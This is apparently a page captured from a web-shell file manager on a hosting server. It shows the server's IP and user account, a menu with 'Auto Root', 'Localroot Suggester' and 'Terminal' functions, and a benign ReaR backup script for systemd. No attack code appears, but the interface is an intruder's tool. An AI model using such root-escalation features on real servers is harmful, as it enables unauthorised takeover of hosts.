Linux ih01.iridiumhosting.com 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64
LiteSpeed
Server IP : 67.227.241.211 & Your IP : 216.73.216.226
Domains :
Cant Read [ /etc/named.conf ]
User : dustinhy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
MXB /
rear /
usr /
share /
rear /
prep /
GNU /
Linux /
Delete
Unzip
Name
Size
Permission
Date
Action
200_include_getty.sh
833
B
-rw-r--r--
2026-04-01 09:39
200_include_serial_console.sh
5.96
KB
-rw-r--r--
2026-04-01 09:39
210_include_dhclient.sh
6.74
KB
-rw-r--r--
2026-04-01 09:39
220_include_lvm_tools.sh
587
B
-rw-r--r--
2026-04-01 09:39
230_include_md_tools.sh
154
B
-rw-r--r--
2026-04-01 09:39
240_include_multipath_tools.sh
578
B
-rw-r--r--
2026-04-01 09:39
280_include_systemd.sh
1.48
KB
-rw-r--r--
2026-04-01 09:39
280_include_virtualbox.sh
646
B
-rw-r--r--
2026-04-01 09:39
280_include_vmware_tools.sh
394
B
-rw-r--r--
2026-04-01 09:39
290_include_drbd.sh
280
B
-rw-r--r--
2026-04-01 09:39
300_check_backup_and_output_url.sh
1.37
KB
-rw-r--r--
2026-04-01 09:39
300_include_grub_tools.sh
2.76
KB
-rw-r--r--
2026-04-01 09:39
310_include_cap_utils.sh
882
B
-rw-r--r--
2026-04-01 09:39
400_guess_kernel.sh
6.64
KB
-rw-r--r--
2026-04-01 09:39
500_EFISTUB_check_kernel.sh
1.14
KB
-rw-r--r--
2026-04-01 09:39
Save
Rename
# Many Linux distro's are using systemd as init mechanism # added systemd-tmpfiles and /{usr|var}/lib/tmpfiles.d # for Fedora (and in the future also RHEL) # for issue #1575 (rpcbind fails to start within rescue system) if ps ax | grep -v grep | grep -q systemd ; then PROGS+=( systemd agetty systemctl systemd-notify systemd-ask-password systemd-udevd systemd-journald journalctl dbus-uuidgen dbus-daemon dbus-send upstart-udev-bridge systemd-tmpfiles ) # cgroup stuff - not required for ReaR #PROGS+=( cg_annotate cgclear cgcreate cgget cgrulesengd cgset cgdelete cgclassify cgexec ) # 1- Depending to the distros, systemd directory/scripts can be located in /usr/lib or /lib # 2- Need to add systemd/network subdir in order to preserve rules about network device naming # (predictable naming or persitant naming / like udev). # more info here: https://www.freedesktop.org/wiki/Software/systemd/PredictableNetworkInterfaceNames/ COPY_AS_IS+=( /usr/share/systemd /etc/dbus-1 /usr/lib/systemd/systemd-* /lib/systemd/systemd-* /usr/lib/systemd/network /lib/systemd/network /usr/lib/systemd/system-generators/systemd-getty-generator /lib/systemd/system-generators/systemd-getty-generator /var/lib/tmpfiles.d /usr/lib/tmpfiles.d ) CLONE_GROUPS+=( input ) Log "Including systemd (init replacement) tool-set to bootstrap Relax-and-Recover" fi